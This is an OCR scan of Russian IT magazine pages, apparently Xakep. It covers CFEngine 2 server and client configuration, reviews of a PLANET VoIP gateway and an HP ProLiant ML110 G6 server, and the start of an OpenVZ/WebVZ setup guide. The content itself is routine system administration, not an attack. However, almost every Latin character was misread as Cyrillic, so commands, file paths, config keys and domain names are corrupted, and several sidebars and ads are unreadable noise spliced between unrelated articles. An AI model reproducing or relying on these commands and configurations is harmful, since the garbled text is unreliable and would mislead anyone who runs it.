оа * псг*огк анооій Ьо еоп^іяигмЬ 

гг гаке я- а мКіІа га вег цр г^аядіпе Іог а пеімвгк (вяресіаІЛу ап 
аігеайу ехізгілд пягмогЮ, Ьиг алее іНаѣ ія гіопе уни иііі мапаіег 
Ьпѵ уои еѵег ІіѵеЛ ыігНаиг ігі 
Ноевраде ; Ь%%р ; //мыи . с Гепдіпе - а гд/ 

Вида : ьг г ра : //Ьмдя . ЪаипеЬржі , прг/иЬцаги/+г ііоьрд 

Информация о пакете сіепдіпег 
в ІІЬипІи 



НАСТРОЙ КА СЕ РВЕ РА Для правильного функциониро- 
вания сервера важно наличие трех конфигурационных 
файлов: 

1 сіа^еіц.сопі — файл правил агента (агент будет полу- 
чать от сервера правила и выполнять их на клиентской 
машине) . 

2 сізегѵсі.сопі — конфигурационный файл сервера, опре- 
деляющий его поведение. 

3 с1гип.Ьо§1:8 — список управляемых машин (клиентов) . 
Начнем с файла правил агента. Его начальное содержимое 
может выглядеть следующим образом: 

$ зисіо ѵі /еІс/с{епдіпе 2 /с{адеп 1 .соггі 

# Настройки 
сопігоі : 

# Список действий 

асііопзедиепсе = ( гезоіѵе Іііез Іібу 
ргосеззез ) 

# Домен 

бошаіп = ( хакер . ги ) 

# Временная зона (Москва) 

Іішезопе = ( МЗК ) 

# ЗМТР-сервер и е-шаіі админа (для отправки 
отчетов об ошибках) 

зшірзегѵег = ( зшір . хакер . ги ) 
зузабш = ( абтіп@хакер . ги ) 

# Модификация гезоіѵ.сопі 
гезоіѵе : 

192.168.1.1 

192.168.1.2 

# Проверка и установка прав доступа на систем- 
ные файлы 

Іііез : 

/еіе/зибоегз тобе=440 оѵліег=гоо! дгоир=гоо! 
ас1іоп=1іха11 

/еіе/раззілб шобе=644 оѵтег=гоо1 дгоир=гоо! 
ас1іоп=1іха11 

/еІс/зНаботл тобе=640 о\ѵпег=гоо! 
дгоир=зЬабоѵ7 ас1іоп=1іха11 

# Очистка каталогов от устаревших файлов 
Іібу : 

/Ітр ра11егп=* аде=7 гесигзе=іп1 
/Ноте ра11егп=*~ аде=7 гесигзе=іп1 

# Управление процессами 
ргосеззез : 

# Перезапускаем іпеіб 
"іпеіб" зідпа1=1іир 



► 118 
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епдіпе 



СйтггііГ'іІіІ иіг I сглікілга I Еп Кпгкаіі I АиІ Ое- иіыл I ЖліТапм ті СГапдІги I СЫіпіпя СПІгкзл 

ТІпе огідіпаі Ореп Зоигсе йезігегі-йіаіе іесКпоІоду 
!ог вегѵег сопіідигаііоп та падете пі 



Ня™ Омпкзайн СИ ьіаіік) □осигпяііа&я» Сяптипйу Зсівпсѳ ОеѵеІорягБ 

»ЛсК (іп*( 5 : ДЬи* рал-.піѵн | Мвва \ 5 иѵісв 5 1 I Сотгпцму рас і СГГІП 1&5 сягігг.ип;у мете 



ІІрдгаШпд Ігот сйэпдіпе 2 СоттипНу Ыеѵѵз 




РвеПг-д геіи ьвпм Ьу аІІ огаепдтвъ песет ІппоѵаІІопТ 

"ГѴу Ійе СТелдрпе- 3 Црдгайе СЫй* 

Аиіопміеа-сопѵегеійп Іа гйй аѵэіІаЫі? Іооиг 
йаитяйШ сігй-ікі*га М евепфпе.йып 
"2 со аиг ЕгіиІІилі ііътгу оп І№ іхлта р.ідц;. 



№ птей Іо ргодгзт ет*іо тэДе і®іів№е эпй гереИэ№5садіоп5, ут 
св*і дИ *№Лей срс4іу ІПе Івдйтаіа « &иггіІ«] еквпчЯте. 



СМ ужі Кгож Шз( СТепдІпе Гт Кя оте 
гаге заде жШі 1435 (Ічі уои 
С-ЭП 4иЬКГ№ ІО ЙГІІМ ІЗІеЫ 
алгшйииеп^ апгі йвч»Іертѳп*а? 



ІѴ1І&5ІОП Тгаіпіпд Сатпр 

ВйЁйГП* а сГиіід ;ш рйтег>івсг. Й:ди ир ІОі яіг 
ггдиіпг Ітіппд сатраі 





Рагіпегіпд іог Зегѵег І_НесусІе ТНапк уои Іо сіепдіпе изегз, 

Мападетеп! - ТНе Сі'епдіпе Теат 



5НА00ѴѴ •& 3 О Р I а№ &* «**■ (ийитд нт к&у 

V I іхі ія-1 гу іс>54.ЧІцгз !□ ЫІпд 

ш рп^(Ді5Ірпп1 ?ирряЧ !□ М5ЭГ5 ^ ЕГО 

ІѴІ 21 1 Г1 I П Р 1 "" мттвгеів* эле гоямпщйСу 

(ЗЗЁ Г Гг " іт* ' > Ѵі «шит. 0 / вцфсгіИд а тяпрійе 

^ !■ * йаіаснівѳ рэсКвдя ІГѵчыдЦ Іеэйітді 

Іпгіін-Ігу зиррііета. жа агѳ тегКІпд Іо 

ѴѴеЬ-сайт проекта СРЕпдіпе 




Тойау. Г&еге Ььѣ гйѵ&г Ьееп а тоге «іеІМід 
ІІта Іо Ьо иіспу аеп$ 1 № 1 » ейпТідлаІіоп 
гтіліад«тм!гЛ зСЛѵътігс-. Ш]Ьг гЫс.-]4с Э, тлМН II* 
рЕре лпй иргсп Орттілііу ВДЕІдп, ,іпеІ 

М« »пплгц:«! рягіггритсі^ спяЛі СТепдіпе ІЧоѵе, 
1» «*ся -адзіоеИ ІГч 

геіІаМе. срлме^депи аиотаІЮТ. веете жапС Іо 
Ітеір иьега Іоирдгэйе ИіИгоІіІечІіѵіІаІІаІІола Со 



Обратившись к документации СРЕпдіпе, ты 
сможешь дополнить его любыми правилами, 
которые актуальны для твоих клиентских 
машин. 

Следующий файл сГзегѵб.сопГ очень прост и 
прозрачен: 

$ зисіо ѵі /еІс/с*епдіпе2/с*5егѵсІ.соггі 

сопіігоі : 

сіотаіп = ( хакер . ги ) 

# Полностью доверять всем хостам 
указанной подсети 

ТгизРКеузРгош = ( 192.168.1.0/24 ) 

апу: : 

# Максимальное количество одно- 
временных соединений 

МахСоппесРіопз = ( 50 ) 

дгапР : 

# Дать доступ всем клиентам, вхо- 
дящим в домен хакер . ги 

/ѵаг/1іЬ/с1епдіпе2 /іприкз 
* . хакер . ги 

Единственное, что следует поменять в нем: 
имя домена и подсети. Наконец, сітип.ІюзЩ 
содержит список обслуживаемых сервером 
хостов: 

$ зисіо ѵі /еІс/с*епдіпе2/с{гип.Ио5Із 

сіотаіп = хакер . ги 
# Управляемые машины 
згѵі . хакер . ги 
згѵ2 . хакер . ги 

Закончив настройку, перезапусти СРЕпдіпе: 

$ зисіо /екс/іпік . <і/сіепдіпе2 гезкагР 



НАСТРОЙКА КЛИЕНТОВ Ключевой конфигу 
рационный файл агента носит имя ирбаіе.сопЕ 
Он нужен для начальной настройки агента до 
того, как он сможет подключиться к серверу 
и забрать основной конфигурационный файл 
сіа^епп.сопЕ Следующего варианта будет впол- 
не достаточно в большинстве ситуаций: 

$ зисіо ѵі /еІс/с{епдіпе2/ирс!аІе.соггі 

сопргоі : 

асРіопзедиепсе = ( сору ) 
сіотаіп = ( хакер . ги ) 

# Имя сервера сіепдіпе 
роіісукозк = ( сізегѵег . хакер . ги ) 

# Каталог сервера, хранящий кон- 
фигурационные файлы 

тазРег_сііприР = ( /ѵаг/ІіЬ/ 
сіепдіпе2/іприРз ) 

# Хранилище бэкапов и мусора 
герозіРогу = ( /ѵаг/ІіЬ/ 

сіепдіпе2 /оиРриРз ) 

# Копирование конфигурационного фай- 
ла сіадепР . сопі с сервера 

# в каталог /еРс/сіепдіпе2 клиента 
сору : 

$ (тазРег_сііприР ) /сіадепР . сопі 
безР=/еРс/сіепдіпе2 /сіадепР . сопі 
тобе=600 

зегѵег=$ (роІісуЬозР) 

іогсе=Ргие 

РгизРкеу=Ргие 

Чтобы сетевая инфраструктура, построенная 
на СЕЕп^іпе, заработала, каждый клиент 
должен быть оснащен не только агентом, но 
и сервером. Вот конфигурационный файл 
сервера для клиентов: 



р гостей* і 
яЬ_мгѵі г : : 

ГИС4ГТ '/«С/ІПІТ .1ІЛ*ИР(І йаП" 

иатеПвП 

*!«•** ГІЛ**({р(Г_СІіЬ<вЛІ І 4д 

яЬііісп—ппіІя: 

00_П1«^Нр4;Е 

’7ігег/5Ып/ир25Шв 
П«ра_іПКе«іНд: : 

' /^5іп/і;Г*,гсгіиу НццнІ вл" 

жІІіШм: 

йррвг^ННЙіЖІІІіг» *1ЙТ, 0,8.1 ІКАЬМпДкААміл ІомМКѵГ 

>Лкг«1* } 

ІІЙЬ*Е 
апу: : 

/щлс/ѵяіА -> 

іісіу: 

у*ь_»гѵ*і\р**і«;; 

/вЕсЛіПргі/сопС . гіЛівІсоте.сяі^ 

аднв 

апу:: 

/*и/гч*».*чиіѵ 

Настраиваем ѵѵеЬ-сервер 

$ зисіо ѵі /еІс/с{епдіпе2/с{5ѳгѵсІ.соггі 

сопбгоі : 

ботаіп = ( хакер . ги ) 

# Разрешить соединения с узлами 
указанной подсети 

АІІотлСоппесРіопзРгот = ( 
192.168.1.0/24 ) 

ТгизбКеузРгот = ( 192.168.1.0/24 ) 

# Сервер должен запустить сіадепб 
сігипСоттапб = ( "/изг/зЬіп/ 

сіадепб" ) 

МахСоппесРіопз = (50) 
дгапб : 

/изг/зЬіп/сіадепб *. хакер. ги 

Заставляем СЕЕп^іпе перечитать свои кон- 
фиги: 

$ зибо /ебс/іпіб . б/сіепдіпе2 гезбагб 

Теперь необходимо настроить клиентские 
машины так, чтобы агент СЕЕп^іпе запускался 
в определенные промежутки времени. 

$ зибо сгопбаЬ -е 

0,30 * * * * /ѵаг/сіепдіпе/Ьіп/сіехесб -Р 

Каждые полчаса сгоп будет запускать сіехесб, 
который вызовет агента СЕЕп^іпе, который 
в свою очередь получит последнюю версию 
сіа^епі.сопі с сервера и выполнит описанные 
в ней правила. Таким образом ты сможешь 
динамически обновлять сіа^епі.сопі на сер- 
вере, и в течение получаса внесенные тобой 
изменения отразятся на клиентах. 

ЧТО ДАЛЬШЕ СЕЕп^іпе — сложный инстру- 
мент, и в этой статье ты открыл для себя лишь 
несколько процентов его возможностей. 
Файлы правил СЕЕп^іпе серьезных контор на- 
считывают сотни и даже тысячи строк, благо- 
даря чему контролируемые им машины могут 
находиться без присмотра в течение месяцев. 

В боковом выносе ѴѴѴѴѴѴ перечислены ссылки 
на ресурсы, обратившись к которым, ты смо- 
жешь узнать о настоящей мощи СЕЕп^іпе. т 
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I ЫаіЬап Віпкегі паШзупаск.ги 




Голос планет 






РІ.АЫЕТѴІР-882: 
ѴоІР-шлюз и не только 




ЯгппсН ОШ** 



Н С псіч иг нагіе Г 



ВгипеЬ ОШсй 




Технические характеристики 
Шлюз ІР-телефонии РІ.АЫЕТ серии 
ѴІР-88Х 

> Порты: 

1 порт ѴѴАІЧ 1 0/1 00 МЬрз ЕЕІ-45 
1 порт ЬАЫ 1 0/1 00 МЬрз Р^-45 
8 портов под разъем Р>1 1 (6хРХ5, 2хРХ0] 

> Стандарты: 

Н.323 ѵ2/ѵЗ/ѵ4 и 5ІР (РРС 3261 ), 50Р (РРС 
2327], Зуттеігіс РТР, 5Т1ЛЧ (РРС3489), 

ЕІЧІІМ (РРС 2916), РТР Рауіоасі Іог ОТМР 
Оідііз ( Р РС2833] , ОиіЬоипсІ РгохуСиррогІ 

> Голосовые кодеки: 

0.71 1 (А-Іаѵѵ/ и-іаѵѵ], 0.729 АВ, 0.723 (6,3 
КЬрз/ 5,3 КЬрз] 



> Поддержка факсов: 

Т.30, Т.38 

> Голосовые стандарты: 

Ѵоісе асііѵііу сіеіесііоп (ѴАО) 

Оотіогі: поізе депегаііоп (С N О] 
0.165/0.168 ЕсЬо сапсеііаііоп 
Оупатіс ДНег В и Ре г 

> Протоколы: 

ТСР/ІР, ІЮР/ВТР/РТСР, НТТР, ІСМР, АРР, 
ІЧАТ, ОНСР, РРРоЕ, РЫБ 

> Другие функции: 

Виртуальный Сервер 
Интеллектуальный 0о5 
ІР Т05 (ІР Ргесесіепсе] / РіРЗегѵ 
Встроенная функция ЫАТ маршрутизатора 



>Типы подключения: 

Статический ІР, РРРоЕ, йНСР клиент 

>Управление: 

ѴѴЕВ, Р5-232 консоль, Теіпеі 

> Питание: 

Внешний адаптер питания 12В постоянного 
тока 

> Габариты (Ш х Гх В): 

300 х 1 60 х 40 мм 



Р1ЛШЕТ ѴІР-882 — ѴоІР-шлюз, предназначен- 
ный для организации телефонной связи между 
офисами компании, расположенными в раз- 
ных городах и странах. Несет на своем борту 
6 портов РХ5 (для подключения телефонных и 
факсимильных аппаратов) и 2 порта РХО (для 
подключения телефонных линий). Устройс- 
тво полностью соответствует спецификациям 
протоколов ІР-телефонии Н.323ѵ4 и 5ІР 2.0, 
поддерживает голосовые кодеки С. 711 (А-1аѵѵ 
/ и-іаѵѵ), С. 729 АВ, С.723 (6,3 Кб/с / 5,3 Кб/с), 
позволяет устанавливать одноранговые (точ- 
ка-точка), Н.323 Саіекеерег и соединения 
через 5ІР прокси-сервера (предусмотрено до 
8-ми одновременных регистраций на разных 
серверах). Шлюз способен производить раз- 
личную обработку голоса, включая Детек- 
тор Активности Голоса (ѴАБ), обнаружение 



БТМР, эхокомпенсация С. 165/С. 168, обна- 
ружение тишины (зііепсе беіесііоп), имеет 
встроенный адаптивный буфер флуктуаций, 
позволяющий избежать искажения голоса 
при задержке (флуктуации) голосового тра- 
фика. 

ѴѴеЪ-интерфейс шлюза позволяет следить за 
текущим состоянием портов (состояние ли- 
нии, вызываемый номер, номер вызывающе- 
го абонента, продолжительность разговора, 
используемый кодек). При возникновении 
проблем захвата пакетов устройство сохранит 
дамп трафика, который можно будет просмот- 
реть с помощью РШегеаІ. Полный отказ шлюза 
или пропадание питания приведет к автома- 
тическому переключению РХ5-портов к пор- 
там РХО, что позволит звонить через обычную 
городскую линию до восстановления полной 



работоспособности. 

РЬАЫРТ ѴІР-882 позволяет организовать ЫАТ, 
благодаря чему его можно использовать для 
организации подключения офисных компью- 
теров к сети интернет. Устройство производит 
приоритизацию ѴоІР-трафика (С^оЗ) для под- 
держания высокого качества голосовой связи 
даже во время интенсивного обращения к ин- 
тернет-ресурсам. Также ѴоІР-шлюз способен 
выполнять функции ОНСР-, 5ОТР-, ПупПЫЗ-, 
Зузіо^-сервера и виртуального сервера (поль- 
зователям интернета можно разрешить под- 
ключения к внутрикорпоративным ѴѴеЪ, РТР 
и другим ресурсам) , поэтому, приобретая ѴІР- 
882, можно немного сэкономить на сетевом 
оборудовании. 

Ориентировочная стоимость шлюза ІР-теле- 
фонии составляет 15300 рублей. 
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Башня за бесценок 



НР РгоЫапІ МНЮ 66: 




серверы последнего 
доступные каждому 

Технические характеристики 
НР РгоЫапІ МІліо 66 

> Процессор (один из): 

ІпіеІХеоп Х3430 (2.40 ГГц, 95 Вт ЮР, 8 Мб 
кеш, 1 333 МГц, ТигЬо 1/1 /2/3] 

ІпіеІХеоп Х3440 (2.53 ГГц, 95 ВтТБР, 8 Мб 
кеш, 1333 МГц, НТ, ТигЬо 1/1/2/3] 

ІпіеІХеоп Х3450 (2.66 ГГц, 95 ВтТОР, 8 Мб 
кеш, 1333 МГц, НТ, ТигЬо 1/1 /4/4] 

ІпіеІХеоп Х3460 (2.80 ГГц, 95 ВтТОР, 8 Мб 
кеш, 1333 МГц, НТ, ТигЬо 1/1/4/5] 

> Память: 

До8 Гб памяти ООРЗ РСЗ-10600Е 1333 МГц, 

4 слота 

> Жесткие диски: 

Шестиканальный 5АТА-контроллер (4 порта 
для жестких дисков] 

До четырех жестких диска 5А5 3.5 м суммар- 
ной емкостью 1 ,8 Тб 

До четырех жестких диска 5АТА 3.5 м суммар- 
ной емкостью 3 Тб 

> Сетевой интерфейс: 

Встроенный гигабитный сетевой адаптер 
N01 07і 

> Питание: 

Блок питания на 300 Вт 



поколения, 



> Расширение: 

РСІ-е Оеп 1 , хі (х4 соппесіог], половинной 
длины 

РСІ 32- б ит/33 МГц 3,3 В 
РСІ-е Оеп 1 , х4 (х8 соппесіог] 

РСІ-е Сеп 2, х 1 6 (х 1 6 соппесіог) 

> Внешние порты ввода-вывода: 

1 последовательный порт 

2 порта Р5/2 

8 портов 115В 2.0 (2 спереди, 4 сзади, 2 внут- 
ри корпуса] 

> Другое: 

Встроенный графический адаптер (до 
1600x1200 16 Ьрр 0 75 Гц, 64 Мб] 

Привод ВѴО-РОМ половинной высоты 
Опциональный модульТРМ 1.2 

Управление: 

Модуль удаленного управления НР РгоЫапІ: 

1 00 66 Бідбіз Оиі 1 00і 

НР РгоЫапІ: МЫ 1 0 66 Базу 5еі-ир С Б 

> Система охлаждения: 

1 системный вентилятор 
1 вентилятор на процессоре 

> Исполнение: 

Башня Місго АТХ (411) 




Башенный сервер шестого поколения от НР 
создан для клиентов, чей путь в бизнесе толь- 
ко начинается. Сочетая в себе проверенные 
временем технологии одного из ведущих 
производителей серверов, современные 
компоненты, высокую производительность 
и цену, не превышающую стоимость обычно- 
го компьютера, НР РгоБіапі: МЫ 10 С6 станет 
идеальным решением для молодых компа- 
ний и малых офисов. 

Внутри корпуса сервера скрыт четы- 
рехъядерный процессор Іпгеі Хеоп серии 
Х3400 (один из четырех, на выбор), ос- 
нащенный технологией Іпгеі ТигЬо Воозг, 
автоматически повышающей тактовую 
частоту процессора сверх номинальной 
в случаях повышенной нагрузки, и моду- 
ли памяти ББКЗ, работающие на частоте 
1333 МГц. Встроенный 5АТА-контроллер 
поддерживает до четырех жестких диска 



5А5/5АТА, суммарной емкостью 1,8 Тб 
или 3 Тб. 

Для установки дополнительных плат рас- 
ширения предусмотрено три слота РСІ 
Ехргезз (один из которых половинной дли- 
ны) и один слот РСІ. На задней стенке кор- 
пуса расположены четыре ІІ5В-порта, еще 
два находятся спереди. Сервер может быть 
установлен в стойку с помощью доступного 
за дополнительную плату НР Тоѵѵег го Каск 
Сопѵегзіоп Тгау. 

Как и более старшие модели модели серверов 
от НР, МЫ 10 С6 оснащен модулем управле- 
ния Іл^Ьгз-Оиі 100і, поддерживающим такие 
функции, как виртуальное управление пита- 
нием, доступ к журналу событий, получение 
сведений о работоспособности системы, вир- 
туализация КѴМ, создание виртуальных на- 
копителей, управление через геіпег, браузер 
или последовательный порт, совместимость 



со стандартами 5МА5Н-СБР, БСМІ 1.0, ІРМІ 
2.0. Установка ПО и начальная настройка 
могут быть существенно упрощены за счет 
использования Базу Зег-ир СБ. 
Опциональный модуль ТРМ (Тгизіеб 
РІагГогт Мобиіе) может быть использо- 
ван для безопасного хранения аутенти- 
фикационной информации (ключи ши- 
фрования и пароли). Работая в связке с 
технологией ѴѴіпсІоѵѵз ВігБоскег, доступ- 
ной в ѴѴіпсІоѵѵз Зегѵег 2008, ТРМ позволит 
прозрачно для пользователей сохранить и 
обезопасить их личные данные даже в том 
случае, если взломщик получит физичес- 
кий доступ к серверу. Производитель за- 
являет о поддержке операционных систем 
Місгозоіт ѴѴіпсІоѵѵз, Кеб Наг Епгегргізе Біпих 
и 51І5Е Біпих Епгегргізе Зегѵег. 

Цена сервера в минимальной конфигурации 
составляет 16500 рублей. 
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ЗУИ/АСК 



Правители 

виртуального 

мираг 

ОБЗОР ПАНЕЛЕЙ УПРАВЛЕНИЯ ВИРТУАЛЬНЫМИ СЕРВЕРАМИ 

Любая серверная технология должна априори поддерживать возмож- 
ностьудаленного управления, без этого она не будет интересна широко- 
му кругу пользователей, а значит, не получит признания. И системы вир- 
туализации, которые становятся все популярнее, только подтверждают 
это правило. В статье рассмотрим решения, при помощи которых можно 
удаленно управлять виртуальными машинами. 



ЯДЕРНЫЙ 0РЕЫѴ2 Для начала разберем 
типичную ситуацию: есть мощный сервер, и 
есть желание заработать, продажей места под 
хостинг. Самым простым и дешевым вариантом 
«нарезать» физический сервер на виртуальные 
является использование ОрепѴ2 ( ОрепѴ2. 
рг§) — расширения кядруііпих, реализую- 
щего концепцию виртуальной среды (Ѵігшаі 
Епѵігоптепщ, ѴЕ) . Виртуализация производит- 
ся на уровне экземпляров ОС, при этом одно 
ядро используется для всех ѴЕ (ядро обеспечи- 
вает виртуализацию, изоляцию, управление 
ресурсами и сохранение текущего состояния 
каждого виртуального частного сервера) . 
Минус ОрепѴ2 очевиден: в качестве гостевых 
операционных систем можно использовать 
только дистрибутивы Ііпих. Но зато улучшается 
масштабируемость (поддерживается до 4096 
процессоров и до 64 Гб оперативной памяти), 
упрощается управление, а накладные расходы 
не превышают 1-3%. Все процессы разделены и 
полностью изолированы друг от друга, каждый 
выполняется в своем адресном простран- 
стве, виртуальное сетевое устройство (ѵепег) 
позволяет иметь свой ІР и правила маршрути- 
зации. Именно поэтому ОрепѴ2 так популярен 
в системах хостинга: клиент получает любое 
количество выделенных виртуальных серверов 
со своими приложениями, которые внешне 
выглядят как отдельные сервера, но построены 
на основе одной аппаратной платформы. 
Рассмотрим установку ОрепѴ2 в ЦЪшіШ/ 
ИеЫап. Основная система должна быть 64-бит- 
ной, так как в этом случае имеется возможность 

► 122 



использования 64-битных шаблонов ОС. А ряд 
ограничений 32-битных ОС (например, макси- 
мальный объем ОЗУ в 4 Гб) лимитирует нас по 
количеству серверов и возможности даль- 
нейшего расширения. Документация Шшпш 
рекомендует использовать для хранения обра- 
зов виртуальных машин систему управления 
дисковым пространством ЕѴМ, что позволит 
выполнять процедуру резервного копирования 
с нулевым временем простоя (2его Боѵѵшіте 
Васкир) и избежать проблем при подключении 
новых дисков. Первым делом нужно отключить 
систему защиты ЗЕІіпихили АррАшюг. Прове- 
ряем текущее состояние: 

$ сітезд I дгер ЗЕЬіпих 
ЗЕЬіпих: БізаЫесІ аЕ ЪооЕ . 

$ сітезд I дгер -і АррАгтог 
АррАгтог: АррАгтог іпіЦіа1І2есі 
АррАгтог: АррАгтог ЕіІезузЕет 
ЕпаЫеб 

Останавливаем работу АррАгтог и удаляем его 
за ненадобностью: 

$ зисіо/ еЕ с / іпіЕ . б/ аррагтог зЕор 
$ зисіо ирбаЕе-гс . сі -Г аррагтог гетоѵе 
$ зисіо арЕ-деЕ гетоѵе аррагтог 
аррагтог-иЕіІз 

Отключить ЯЕТ.іпих можно разными способами. 
Например, указать параметр «5е1іпих= 0» в па- 
раметрах ядра, в настройках загрузчика тепи. 
І5Г: «кегпеі .... 5е1іпих= 0», либо в /егс/зузсопй^/ 



зеііпих установкой «5е1іпих= сІізаЫесІ». Отклю- 
чить немедленно можно командой: 

$ зисіо зеЕепЕогсе О 

ЦЪипГовскоеядро, используемое по умолча- 
нию, не поддерживает ОрепѴ2, но в офици- 
альном репозитарии уже имеется для этого 
все необходимое. Кроме того, можно скачать 
последнюю версию ядра с сайта ОрепѴ2 и 
собрать ядро самостоятельно. Разработчики 
ОрепѴ2 предлагают КРМ пакеты для КНЕЬ и 
репозитарий для Шшпш 8.04 ЕГ5. Чтобы его 
подключить, в файл /егс/арг/зоигсез.іізі: следует 
добавить строчку: 

беЪ ЬЕЕр : / /боѵтіоасі. орепѵг . огд/ 
иЪипЕи йагсЗу ехрегітепЕаІ 

Обновляем список пакетов и смотрим, что нам 
могут предложить : 

$ зисіо арЕ-деЕ ирбаЕе 
$ зисіо арЕ-саске зеагск орепѵг 

Ставим самое последнее ядро вместе с утилита- 
ми управления: 

$ зисіо арЕ-деЕ іпзЕаІІ Ііпих-орепѵг 
ѵгсЕ 1 ѵгсдиоЕа 

Теперь необходимо изменить некоторые 
системные настройки, для этого правим /еіс/ 
зузсні.сопі: 
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$5исІопапо/еІс/5у5си.соггі РАЗБОРКИ С ѴѴЕВѴ2 



# Включаем форвардинг, отключаем АКР прокси 
пеб . ірѵ4 . сопб . бебаиіб . богмагбіпд=1 

пеб . ірѵ4 . сопб . бебаиіб . ргоху_агр=1 

пеб . ірѵ4 . ір_богмагб=1 

пеб . ірѵ4 . сопб . аіі . гр_бі1бег=1 

пеб . ірѵ4 . сопб . бебаиіб . зепб_гебігесбз=1 

пеб . ірѵ4 . сопб . аіі . зепб_гебігесбз=0 

# Включаем магические ЗузКд клавиши (подробнее об исполь- 
зовании ЗузКд читай в статье «Секреты горячего админист- 
рирования» из Х_03_2008) 

кегпеі . зузгд=1 

Сохраняем изменения и применяем их: 

$ зибо зузсбі -р 

Если ѴМ будут использовать диапазон ІР-адресов, отличный от реальной 
системы, то в конфиге ОрепѴ2 параметру ШЮНВОШЛЭЕѴ5 присваива- 
ем значение аіі: 

$ зисіо папо /еіс/ѵг/ѵг.сопі 

ЫЕ I СНВОШ_БЕ" 73 = а 1 1 

Проверяем наличие записи о новом ядре в конфиге загрузчика (она 
вносится автоматически при установке пакета) : 



Панель ѴѴеЪѴ2 (ЧѵеЪѵг.збпеі:) — достаточно легкий и простой в использо- 
вании инструмент для управления ОрепѴ2, написанный на КиЪу. Имеет 
встроенный ве б-сервер (ѴѴеЬгіск) , для хранения данных используется БД 
ЗОБйе. При помощи ѴѴеЪѴ2 можно: 

• управлять контейнерами ОрепѴ2 (создавать, запускать, останавливать, 
удалять); 

• переносить контейнеры в другой Нози Ъкхіе; 

• создавать и управлять файлами конфигурации ОрепѴ2, назначать 
ІР-адреса; 

• управлять шаблонами - копировать, создавать, удалять; 

• управлять работой ОрепѴ2; 

• создавать резервные копии и восстанавливать работу ѴМ; 

• управлять доступом; 

• получать отчеты по работе контейнеров. 

Одним словом, все, что обычно приходилось делать при помощи кон- 
сольных команд или самописных скриптов. Процесс инсталляции ѴѴеЬѴ2 
очень легкий. Управление консолью производится через 8887 и 8888 
порты, поэтому их следует открыть в йгеѵѵаіі. Для начала нам понадобятся 
все необходимые компоненты КиЪу и 5 (^Ьке . Пакеты для установки Каііз 
(шЬѵопгаіІз.огч) уже есть в репозитарии, но они обычно запаздывают. Так, 
на момент написания этих строк в репозитарии находилась версия 2.0.2, 
тогда какдля работы текущей версии ѴѴеЪѴ2 требуется Каііз 2.3.2 (послед- 
няя 2.3.5, но нужна именно 2.3.2) . В іЛэипш имеется специальный проект 
ІЛэипш оп Каііз Теат ПаипсЬраб . пег/— иЪипт-оп-гаіІз) . предлагающий 
обновленные пакеты для разработчиков КиЪу. Подключаем поддерживае- 
мый ими репозитарий, прописав в зоигсе.НзЦ 



$ дгер орепѵг /Ъооб/дгиЪ/тепи . Ізб 



Следующий шаг необязательный, но желательный: многие утилиты 
ОрепѴ2 по умолчанию используют в качестве домашнего каталог /ѵг. 
Поэтому создадим символическую ссылку, чтобы избежать возможных 
проблем: 

$ зибо 1п -з /ѵаг/ІіЬ/ѵг /ѵг 



беЬ Ъббр: //рра . 1аипскраб.пеб/иЪипби-оп-гаі1з/рра/иЪипби 
Ьагбу шаіп 

беЬ-згс Ъббр : //рра . 1аипсЪраб.пеб/иЪипби-оп-гаі1з/рра/ 
иЪипби Ъагбу гпаіп 

Добавляем ключ, чтобы АРТ не ругался: 



После перезагрузки с новым ядром скачиваем в /ѵгЛетрІаШ/сасЪе 
шаблоны систем, которые будем использовать для виртуализации (пол- 
ный список смотри на щікі.орепѵг.огч/РоѵтІоаб/ЩтрІаШ/ргесгеаШсП . 

Например ІЛэипш: 

$ хѵдеб -с Ъббр : / /боѵтіоаб. орепѵг . огд/бетріабе/ 
ргесгеабеб/ сопбгіЪ/иЪипби-8 . 04 . 2-і386-тіпіта1 . баг . дг 
$ зибо ср -ѵ иЪипби-8 . 04 . 2-і386-тіпіта1 . баг . дг /ѵг/ 
бетрІабе/сасЪе 

Внутри архива содержится минимальная система. Она не локализована, 
но это можно исправить уже в процессе использования. При массовом 
же развертывании лучше локализовать ѴМ в контейнере, из которого и 
создать новый шаблон. В интернете можно найти сторонние сборки для 
ОрепѴ2, например пюбегпабтіп.сот/боѵѵп1оаб5/?б=05Щтр1аШ5/хеп . 



$ зибо арб-кеу абѵ --кеузегѵег кеузегѵег .иЬипби . сот \ 
--гесѵ-кеуз В6С632 6781С0ВЕ11 

Теперь ставим компоненты: 

$ зибо арб-деб іпзбаіі гиЬу гиЬудетз ІіЬздІібеЗ-гиЬу \ 
здІібеЗ ігЬ ІіЬорепззІ-гиЬу ІіЬгеабІіпе-гиЬу гбос 

К сожалению, в репозитарии находится также не самая последняя версия 
шЪу§ет5, поэтому этот пакет необходимо обязательно обновить, иначе 
дальнейшие шаги будут невозможны: 

$ зибо дет ирбабе --зузбет 

Если после этого команда «§ет іпзбаіі» не сработает, надо установить 
шЪу§ет5 при помощи архива с исходными текстами: 
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Утилита мониторинга виртуаль- 
ныххостов НурегѴ_Моп 
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Шаблоны ОС для ОрепѴІ можно загрузить на офсайте 



• 0репѴ2 — средство 
для создания изолиро- 
ванных виртуальных 
серверов. При ис- 
пользовании 0репѴ2 
основными ограничи- 
вающими фаеторами 
являются скорость 
процессора и объем 
оперативной памяти. 
•Помимоограничен- 
ности в выборе гостевой 
опера ционки (только 

Ы п их-дистри бути в ы] , 
у0репѴ2 есть еще 
один минус: все кон- 
тейнеры используют 
общий дисковый кэш 
и общий раздел 
подкачки. 

• Оснастка 

АиіЬогігаііоп Мападег 
(АгМап.тзс) пред- 
назначена для более 
точного делегирова- 
ния полномочий на 
управлениеѴМ 
вереде Ну ре г- V. 




> бѵб 



На прилагаемом к 
журналу диске ты 
найдешь видеоролик, 
в котором показан 
процесс установки 
0репѴ2 + ѴѴеЬѴ/ на 
ІІЬигби Ыпих. 



$ ѵ^деС -с Ьккр : //гиЬуіогде . огд/ігз/боѵтіоаб. 
рЬр/60718/гиЪудетз-1 .3.5. Сдг 
$ Саг Х 2 ѵі гиЪудетз-1 .3.5. кд 2 
$ сб гиЪудетз-1 .3.5 
$ зибо гиЬу зекир . гЬ 

$ зисіо 1п -з /изг/Ьіп/детІ . 8 /изг/Ьіп/дет 

Теперь можно ставить Каііз. Как уже говорилось, ѴѴеЪѴ2 тре- 
бует версию 2.3.2, которую можно установить командой: 

$ зибо дет іпзкаіі -ѵ=2.3.2 гаііз 

Если не использовать «-ѵ= 2.3.2», будет инсталлирована 
последняя актуальная версия, с которой ѴѴеЪѴ2 откажется 
запускаться, но проблема решается правкой переменной 
